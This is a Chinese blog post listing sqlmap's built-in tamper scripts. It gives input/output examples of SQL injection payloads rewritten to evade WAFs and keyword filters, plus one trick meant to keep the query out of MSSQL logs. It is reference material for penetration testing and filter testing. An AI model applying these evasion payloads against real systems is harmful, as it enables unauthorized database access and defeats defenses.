SQLMAP自带的绕过脚本 --tamper详解

2024-01-20 07:58
文章标签 自带 详解 脚本 sqlmap 绕过 tamper

本文主要是介绍SQLMAP自带的绕过脚本 --tamper详解,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

记录一下,方便日后查询。 

(1) apostrophemask.py UTF-8编码 
Example: 
* Input: AND '1'='1' 
* Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87 

(2) apostrophenullencode.py unicode编码 
Example: 
* Input: AND '1'='1' 
* Output: AND %00%271%00%27=%00%271%00%27 

(3) appendnullbyte.py 添加%00 
Example: 
* Input: AND 1=1 
* Output: AND 1=1%00 
Requirement: 
* Microsoft Access 

(4) base64encode.py base64编码 
Example: 
* Input: 1' AND SLEEP(5)# 
* Output: MScgQU5EIFNMRUVQKDUpIw== 

(5) between.py 以”not between”替换”>“ 
Example: 
* Input: 'A > B' 
* Output: 'A NOT BETWEEN 0 AND B' 

(6) bluecoat.py 以随机的空白字符替代空格,以”like”替代”=“ 
Example: 
* Input: SELECT id FROM users where id = 1 
* Output: SELECT%09id FROM users where id LIKE 1 
Requirement: 
* MySQL 5.1, SGOS 

(7) chardoubleencode.py 双重url编码 
Example: 
* Input: SELECT FIELD FROM%20TABLE 
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

(8) charencode.py url编码 
Example: 
* Input: SELECT FIELD FROM%20TABLE 
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

(9) charunicodeencode.py 对未进行url编码的字符进行unicode编码 
Example: 
* Input: SELECT FIELD%20FROM TABLE 
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Requirement: 
* ASP 
* ASP.NET 

(10) equaltolike.py 以”like”替代”=“ 
Example: 
* Input: SELECT * FROM users WHERE id=1 
* Output: SELECT * FROM users WHERE id LIKE 1 

(11) halfversionedmorekeywords.py在每个关键字前添加条件注释 
Example: 
* Input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa 
* Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa 
Requirement: 
* MySQL < 5.1 

(12) ifnull2ifisnull.py 以”IF(ISNULL(A), B, A)”替换”IFNULL(A, B)” 
Example: 
* Input: IFNULL(1, 2) 
* Output: IF(ISNULL(1), 2, 1) 
Requirement: 
* MySQL 
* SQLite (possibly) 
* SAP MaxDB (possibly) 

(13) modsecurityversioned.py 条件注释 
Example: 
* Input: 1 AND 2>1-- 
* Output: 1 /*!30000AND 2>1*/-- 
Requirement: 
* MySQL 

(14) modsecurityzeroversioned.py 条件注释,0000 
Example: 
* Input: 1 AND 2>1-- 
* Output: 1 /*!00000AND 2>1*/-- 
Requirement: 
* MySQL 

(15) multiplespaces.py 添加多个空格 
Example: 
* Input: UNION SELECT 
* Output:  UNION   SELECT 

(16) nonrecursivereplacement.py 可以绕过对关键字删除的防注入(这个我也不知道怎么说好,看例子。。。) 
Example: 
* Input: 1 UNION SELECT 2-- 
* Output: 1 UNUNIONION SELSELECTECT 2-- 

(17) percentage.py 在每个字符前添加百分号(%) 
Example: 
* Input: SELECT FIELD FROM TABLE 
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E 
Requirement: 
* ASP 

(18) randomcase.py 随即大小写 
Example: 
* Input: INSERT 
* Output: InsERt 

(19) randomcomments.py 随机插入区块注释 
Example: 
'INSERT' becomes 'IN/**/S/**/ERT' 
securesphere.py 语句结尾添加”真”字符串 
Example: 
* Input: AND 1=1 
* Output: AND 1=1 and '0having'='0having' 

(20) sp_password.py 语句结尾添加”sp_password”迷惑数据库日志(很。。。) 
Example: www.2cto.com 
* Input: 1 AND 9227=9227-- 
* Output: 1 AND 9227=9227--sp_password 
Requirement: 
* MSSQL 

(21) space2comment.py 以区块注释替换空格 
Example: 
* Input: SELECT id FROM users 
* Output: SELECT/**/id/**/FROM/**/users 

(22) space2dash.py 以单行注释”--”和随机的新行替换空格 
Example: 
* Input: 1 AND 9227=9227 
* Output: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227 
Requirement: 
* MSSQL 
* SQLite 

(23) space2hash.py 以单行注释”#”和由随机字符组成的新行替换空格 
Example: 
* Input: 1 AND 9227=9227 
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 
Requirement: 
* MySQL 

(24) space2morehash.py 没看出来和上面那个有什么区别。。 
Requirement: 
* MySQL >= 5.1.13 

(25) space2mssqlblank.py 以随机空白字符替换空格 
Example: 
* Input: SELECT id FROM users 
* Output: SELECT%08id%02FROM%0Fusers 
Requirement: 
* Microsoft SQL Server 

(26) space2mssqlhash.py 以单行注释”#”和新行替换空格 
Example: 
* Input: 1 AND 9227=9227 
* Output: 1%23%0A9227=9227 
Requirement: 
* MSSQL 
* MySQL 

(27) space2mysqlblank.py 以随机空白字符替换空格 
Example: 
* Input: SELECT id FROM users 
* Output: SELECT%0Bid%0BFROM%A0users 
Requirement: 
* MySQL 

(28) space2mysqldash.py 以单行注释和新行替换空格 
Example: 
* Input: 1 AND 9227=9227 
* Output: 1--%0AAND--%0A9227=9227 
Requirement: 
* MySQL 
* MSSQL 

(29) space2plus.py 以”+”替换空格 
Example: 
* Input: SELECT id FROM users 
* Output: SELECT+id+FROM+users 

(30) space2randomblank.py 随机空白字符替换空格 
Example: 
* Input: SELECT id FROM users 
* Output: SELECT\rid\tFROM\nusers 

(31) unionalltounion.py 以”union all”替换”union” 
Example: 
* Input: -1 UNION ALL SELECT 
* Output: -1 UNION SELECT 

(32) unmagicquotes.py 以”%bf%27”替换单引号,并在结尾添加注释”--” 
Example: 
* Input: 1' AND 1=1 
* Output: 1%bf%27 AND 1=1--%20 

(33)versionedkeywords.py 对不是函数的关键字条件注释 
Example: 
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))# 
* Output:  1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
Requirement: 
* MySQL 


(34) versionedmorekeywords.py 对关键字条件注释 
Example: 
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# 
* Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Requirement: 
* MySQL >= 5.1.13

这篇关于SQLMAP自带的绕过脚本 --tamper详解的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/625296

相关文章

Python异步编程之await与asyncio基本用法详解

Python异步编程之await与asyncio基本用法详解

《Python异步编程之await与asyncio基本用法详解》在Python中,await和asyncio是异步编程的核心工具,用于高效处理I/O密集型任务(如网络请求、文件读写、数据库操作等),接... 目录一、核心概念二、使用场景三、基本用法1. 定义协程2. 运行协程3. 并发执行多个任务四、关键
阅读更多...
从基础到进阶详解Python条件判断的实用指南

从基础到进阶详解Python条件判断的实用指南

《从基础到进阶详解Python条件判断的实用指南》本文将通过15个实战案例,带你大家掌握条件判断的核心技巧,并从基础语法到高级应用一网打尽,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一... 目录​引言:条件判断为何如此重要一、基础语法:三行代码构建决策系统二、多条件分支:elif的魔法三、
阅读更多...
Java利用@SneakyThrows注解提升异常处理效率详解

Java利用@SneakyThrows注解提升异常处理效率详解

《Java利用@SneakyThrows注解提升异常处理效率详解》这篇文章将深度剖析@SneakyThrows的原理,用法,适用场景以及隐藏的陷阱,看看它如何让Java异常处理效率飙升50%,感兴趣的... 目录前言一、检查型异常的“诅咒”:为什么Java开发者讨厌它1.1 检查型异常的痛点1.2 为什么说
阅读更多...
MySQL的配置文件详解及实例代码

MySQL的配置文件详解及实例代码

《MySQL的配置文件详解及实例代码》MySQL的配置文件是服务器运行的重要组成部分,用于设置服务器操作的各种参数,下面:本文主要介绍MySQL配置文件的相关资料,文中通过代码介绍的非常详细,需要... 目录前言一、配置文件结构1.[mysqld]2.[client]3.[mysql]4.[mysqldum
阅读更多...
springboot2.1.3 hystrix集成及hystrix-dashboard监控详解

springboot2.1.3 hystrix集成及hystrix-dashboard监控详解

《springboot2.1.3hystrix集成及hystrix-dashboard监控详解》Hystrix是Netflix开源的微服务容错工具,通过线程池隔离和熔断机制防止服务崩溃,支持降级、监... 目录Hystrix是Netflix开源技术www.chinasem.cn栈中的又一员猛将Hystrix熔
阅读更多...
Java调用Python脚本实现HelloWorld的示例详解

Java调用Python脚本实现HelloWorld的示例详解

《Java调用Python脚本实现HelloWorld的示例详解》作为程序员,我们经常会遇到需要在Java项目中调用Python脚本的场景,下面我们来看看如何从基础到进阶,一步步实现Java与Pyth... 目录一、环境准备二、基础调用:使用 Runtime.exec()2.1 实现步骤2.2 代码解析三、
阅读更多...
python之uv使用详解

python之uv使用详解

《python之uv使用详解》文章介绍uv在Ubuntu上用于Python项目管理,涵盖安装、初始化、依赖管理、运行调试及Docker应用,强调CI中使用--locked确保依赖一致性... 目录安装与更新standalonepip 安装创建php以及初始化项目依赖管理uv run直接在命令行运行pytho
阅读更多...
Springboot项目构建时各种依赖详细介绍与依赖关系说明详解

Springboot项目构建时各种依赖详细介绍与依赖关系说明详解

《Springboot项目构建时各种依赖详细介绍与依赖关系说明详解》SpringBoot通过spring-boot-dependencies统一依赖版本管理,spring-boot-starter-w... 目录一、spring-boot-dependencies1.简介2. 内容概览3.核心内容结构4.
阅读更多...
MySQL中REPLACE函数与语句举例详解

MySQL中REPLACE函数与语句举例详解

《MySQL中REPLACE函数与语句举例详解》在MySQL中REPLACE函数是一个用于处理字符串的强大工具,它的主要功能是替换字符串中的某些子字符串,:本文主要介绍MySQL中REPLACE函... 目录一、REPLACE()函数语法:参数说明:功能说明:示例:二、REPLACE INTO语句语法:参数
阅读更多...
redis数据结构之String详解

redis数据结构之String详解

《redis数据结构之String详解》Redis以String为基础类型,因C字符串效率低、非二进制安全等问题,采用SDS动态字符串实现高效存储,通过RedisObject封装,支持多种编码方式(如... 目录一、为什么Redis选String作为基础类型?二、SDS底层数据结构三、RedisObject
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2